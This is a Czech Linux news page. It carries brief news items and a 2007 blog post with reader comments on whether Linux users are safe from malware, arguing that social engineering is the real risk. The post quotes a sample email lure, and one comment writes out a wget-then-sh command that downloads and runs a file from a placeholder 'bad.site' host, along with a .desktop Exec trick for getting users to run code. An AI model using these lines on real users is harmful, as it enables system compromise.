CiviCRM (Wikipedie) bylo vydáno v nové verzi 6.14.0. Podrobnosti o nových funkcích a opravách najdete na release stránce. CiviCRM je robustní open-source CRM systém navržený speciálně pro neziskové organizace, spolky a občanské iniciativy. Projekt je napsán v jazyce PHP a licencován pod GNU Affero General Public License (AGPLv3). Český překlad má nyní 45 % přeložených řetězců a přibližuje se milníku 50 %. Potřebujeme vaši pomoc, abychom se dostali dál. Pokud máte chuť přispět překladem nebo korekturou, přidejte se na platformu Transifex.
Další lokální zranitelností Linuxu je ssh-keysign-pwn. Uživatel si může přečíst obsah souborů, ke kterým má právo ke čtení pouze root, například soubory s SSH klíči nebo /etc/shadow. V upstreamu již opraveno [oss-security mailing list].
Singularity (YouTube) je nejnovější otevřený film od Blender Studia. Jedná se o jejich první 4K HDR film.
Vyšla hra Život Není Krásný: Poslední Exekuce (Steam, ProtonDB). Kreslená point & click adventura ze staré školy plná černého humoru a nekorektního násilí. Vžijte se do role zpustlého exekutora Vladimíra Brehowského a projděte s ním jeho poslední pracovní den. Hra volně navazuje na sérii Život Není Krásný.
Společnost Red Hat představila Fedora Hummingbird, tj. linuxovou distribuci s nativním kontejnerovým designem určenou pro vývojáře využívající AI agenty.
Hru The Legend of Zelda: Twilight Princess od společnosti Nintendo si lze nově díky projektu Dusklight (původně Dusk) a reverznímu inženýrství zahrát i na počítačích a mobilních zařízeních. Vyžadována je kopie původní hry (textury, modely, hudba, zvukové efekty, …). Ukázka na YouTube. Projekt byl zahájen v srpnu 2020.
Byla vydána nová major verze 29.0 programovacího jazyka Erlang (Wikipedie) a související platformy OTP (Open Telecom Platform, Wikipedie). Detailní přehled novinek na GitHubu.
Po zranitelnostech Copy Fail a Dirty Frag přichází zranitelnost Fragnesia. Další lokální eskalace práv na Linuxu. Zatím v upstreamu neopravena. Přiřazeno ji bylo CVE-2026-46300.
Sovereign Tech Agency (Wikipedie) prostřednictvím svého fondu Sovereign Tech Fund podpoří KDE částkou 1 285 200 eur.
Google na včerejší akci The Android Show | I/O Edition 2026 (YouTube) představil celou řadu novinek: Gemini Intelligence, notebooky Googlebook, novou generaci Android Auto, …
Poté, co pan Kaspersky na root.cz pronesl, že počet virů bude stoupat s nárůstem uživatelů Linuxu, strhla se vlna příspěvků, které ho odsoudili. Jenže, je (a bude) Linux a především jeho uživatelé v bezpečí?
Význam slova (počítačový) vir prošel časem jistou proměnou. Za dávných časů MS-DOSu existovaly viry jako OneHalf, Pieczk, které napadaly bootsektory disket, rezidentně se schovávaly v paměti a chovaly se polymorfně. Všeobecně to byly velmi sofistikované kusy kódu, navíc s destruktivními účinky.
Ovšem doba pokročila. Dnes se běžně pod pojem vir schová spyware, červ, nebo jakýkoli jiný, zákeřný kód zhusta vygenerovaný nějakým scriptkiddie ve VisualBasicu. Odborníci sice protestují a používají termíny přesně, ale jsou v přesile (a koneckonců máme demokracii 
) a je to častem zdrojem nedorozumění.
Doba změnila i účel těchto aplikací. Místo destruktivní činnosti se zaměřují na posílání spamů, sledování uživatele, zobrazování reklam, nebo obecně slouží jako jednotka v nějakém tom botnetu
Takže pojmem vir obecně označuje libovolný škodlivý kód a já ho budu v tomto významu používat i nadále.
Mnoho virů se šíří automaticky kdysi po disketách, dnes po síti. Ovšem trojské koně, nebo spyware, je často součástí nějaké aplikace. Nástupu ILOVEYOU ukázal, že místo složitých technik je jednodušší prostě použít sociálního inženýrství a nechat uživatele, ať si kód posílejí sami.
Klasické viry typu OneHalf - vůči nim je Linux díky svojí unixové architektuře odolný. Systém oddělených práv v kombinaci s aktualizovaným systémem a velkou heterogenitou těchto systémů neumožňují psát viry, které by se mohly víc šířit - seznam linuxových virů
Červy - jsou velice podobné virům, ale klasicky se takto označují ty programy, které se šíří prostřednictvím sítě. Unixové systémy nejsou proti těmto útokům odolné, ale rychlé bezpečnostní aktualizace spolu s velkou heterogenitou nedávají těmto potvůrkám velkou šanci. Navíc, útoky jsou vesměs vedeny proti známým děravým programům typu ftp servery, nebo bind, které proto mnozí správci ponechávají v chrootu.
Z hlediska správce serveru jsou tyto útoky významné, z hlediska desktopového uživatele už méně (pokud si aktualizuje distribuci, je téměř bez šance mu nakazit systém)
Na desktopu v současnosti používají Linux vesměs geekové, takže vytvářet ILOVEOYU.sh je úplně zbytečné, protože si to nikdo nespustí. Jenže, pokud jej bude používat každá sekretářka, bude se ILOVEYOU.sh spouštět i tam. Jediným rozdílem je, že je na Linuxu řádově složitější takový program spustit, ale v momentě, kdy bude v emailu od kamarádky napsaný návod, pravděpodobnost spuštění vzroste.
Navíc, každý správný unix nabízí dostatek prostoru pro oběšení uživatele. Takové KDE se svým DCOPem nabízí takové možnosti, nad nimiž by se bastličům ve VBS asi protočily panenky. Jakmile nastoupí DBUS, bude mít každý vir, který nějak uživatele donutí, aby jej spustil, prakticky ráj na zemi. Prohlížeče pravidelně ukazující zadané weby, dialogová okna s reklamou, a kdo ví, co všechno tyto lidi napadne.
Linux jako systém je vůči škodlivému kódu odolný. Nemusíme se bát automaticky spouštěných příloh, nebo naboření systému. Máme balíčky, máme unixovou architekturu, atd. A v současnosti je většina linuxáků počítačovými odborníky, co nespouštějí každou blbost.
Ovšem na co dnes rozhodně není nikdo připraven je situace, až začnou negeekům chodit emaily typu
To view naked Paris Hilton, save an attachment and type 'sh paris_naked.sh'a budou volat vás, kteří budete budete muset počítač od toho nějak vyčistit (a poslouchat řeči "vždyť jsi říkal, že na tom Linuxu nemají být viry"). A před neznalostí/hloupostí uživatele nedokáže chránit žádný systém (který by šlo zároveň používat).
Tiskni
Sdílej:
AbcLinuxu.cz
ITBiz.cz
HDmag.cz
AbcPráce.cz
sh paris-hilton.wmv.
Ale nejlepší bude, použít takové ty .desktop soubory (z ~/Desktop), protože lidi si často ukládají věci na plochu. Ty mají samozřejmě i položku Exec...
wget "http://bad.site/virus -O /tmp/virus"; sh /tmp/virus ...
27.4.2007 13:57
David Heidelberg | skóre: 46
| blog: blog_
Někdy přemýšlím, jestli náhodou sami neplatí za vývoj(nebo nevyvyjí) virů , aby si každý musel koupit jejich skvělý produkt který ochrání jeho počítač
0K1AS
PS: Osobně mně tedy přijde, že ani na Windows(XP SP2,bez WinUpdate) zkušenější uživatel nepotřebuje antivirus. Stačí nespouště exe které člověk si nestahnul z ověřených zdrojů. Samozřejmě i tak je dobré jednou za pl roku to něčím zkontrolovat, ale po 2 letech jsem nepotkal ani virus.
PS: Osobně mně tedy přijde, že ani na Windows(XP SP2,bez WinUpdate) zkušenější uživatel nepotřebuje antivirus. Stačí nespouště exeNení to tak dávno, co se Windowsy hromadně nakazily pouze surfováním po netu - rozhodně nebylo třeba spouštět žádné .exe. To byl takovej ten virus, co po čase rebootnul systém... je to několik málo let a bylo to opravdu všude. Dokonce obchody nabízely (nevím jestli u nás, ale v Německu ano) k nedávno prodaným počítačům CD s aktualizací a pomocným programem.
27.4.2007 14:09
xxx | skóre: 42
| blog: Na Kafíčko
.
27.4.2007 14:10
David Heidelberg | skóre: 46
| blog: blog_
, ale FireFox
27.4.2007 14:47
Luk | skóre: 47
| blog: Kacířské myšlenky
| Kutná Hora
27.4.2007 15:37
clipper | skóre: 23
| blog: Nic než tohle
Když selžou všechny pokusy uvést zařízení do provozu, je dobré přečíst si návod.Není to tak dávno, co se Windowsy hromadně nakazily pouze surfováním po netu - rozhodně nebylo třeba spouštět žádné .exe. To byl takovej ten virus, co po čase rebootnul systém... je to několik málo let a bylo to opravdu všude.To je ta méně závažná polovina. Ve skutečnosti je tato díra zajímavější tím, že na ni existoval Windows exploit jak pro script kiddie, kam stačilo zadat pouze cílovou IP adresu a vyskočil vzdálený příkazový řádek. Jmenovalo se to nějak na způsob DCOM RPC Exploit by DarkSideOfKalez. A tomu restartu šlo zabránit nějakým přepínačem od shutdown, tuším shutdown /k nebo shutdown /i.
27.4.2007 14:07
xxx | skóre: 42
| blog: Na Kafíčko
. Firmy jak Symantec apod. nevydělavají díky nějakým zkušeným haxourům, kteří píší sofistikované viry, ale vydělávají jen a pouze na blbosti uživatelů.
27.4.2007 14:46
Shadow | skóre: 25
| blog: Brainstorm
27.4.2007 14:54
Luk | skóre: 47
| blog: Kacířské myšlenky
| Kutná Hora
.
Jinak hezky sepsane.
Zkusil, většinou segfaultovaly, nebo na něčem spadly, ale pár se jich zdálo spustitelných. ;)
27.4.2007 15:00
Paris.Hilton.desktop (sh, py, pl, ...) tak to poslední, co udělám je, že na to kliknu, dokud nezjistím, o co jde Takto se asi zachová většina uživatelů.
Na druhou stranu, co se asi stane, až přijde mojí přítelkyni email od kamarádky s přílohou Brad.Pitt.desktop s instrukcemi, ulož na plochu a klikni? 
Na druhou stranu, co se asi stane, až přijde mojí přítelkyni email od kamarádky s přílohouPak Linux zvítězilBrad.Pitt.desktops instrukcemi, ulož na plochu a klikni?